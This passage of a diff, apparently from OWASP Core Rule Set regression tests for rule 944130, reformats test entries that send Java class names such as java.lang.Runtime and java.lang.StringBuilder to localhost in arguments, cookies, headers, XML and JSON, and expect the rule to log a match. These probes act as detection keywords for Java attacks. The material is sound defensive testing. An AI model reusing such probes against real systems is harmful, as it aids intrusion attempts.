\"944130\"" + - test_id: 345 desc: "Cookie name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-346 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Runtime=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 346 desc: "Request header test includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-347 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Runtime + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 347 desc: "XML attribute value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-348 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 348 desc: "XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-349 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 349 desc: "Nested XML element value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-350 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 350 desc: "Content-Type text/plain includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - test_title: 944130-351 + - input: + dest_addr: "127.0.0.1" + port: 80 
+ headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944130\"" + - test_id: 351 desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-352 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Runtime\"}" + output: + log_contains: "id \"944130\"" + - test_id: 352 desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - 
data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-353 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Runtime\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 353 desc: "Argument test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-354 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 354 desc: "Argument name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-355 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String=test" + output: + log_contains: "id \"944130\"" + - test_id: 355 desc: "Cookie test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-356 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 356 desc: "Cookie name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-357 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.String=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 357 desc: "Request header test includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-358 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.String + method: "POST" + uri: "/post" + version: "HTTP/1.0" 
+ data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 358 desc: "XML attribute value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-359 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 359 desc: "XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-360 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 360 desc: "Nested XML element value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-361 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 361 desc: "Content-Type text/plain includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - test_title: 944130-362 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.String" + output: + log_contains: "id \"944130\"" + - test_id: 362 desc: "Content-Type application/json arg value includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-363 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.String\"}" + output: + log_contains: "id \"944130\"" + - test_id: 363 desc: "Content-Type application/json arg name includes keyword java.lang.String" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-364 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.String\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 364 desc: "Argument test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-365 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 365 desc: "Argument name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - 
output: - log_contains: "id \"944130\"" - - test_title: 944130-366 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder=test" + output: + log_contains: "id \"944130\"" + - test_id: 366 desc: "Cookie test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-367 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 367 desc: "Cookie name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-368 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.StringBuilder=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 368 desc: "Request header test includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-369 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.StringBuilder + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + 
output: + log_contains: "id \"944130\"" + - test_id: 369 desc: "XML attribute value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-370 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 370 desc: "XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-371 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 371 desc: "Nested XML element value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-372 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 372 desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - test_title: 944130-373 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
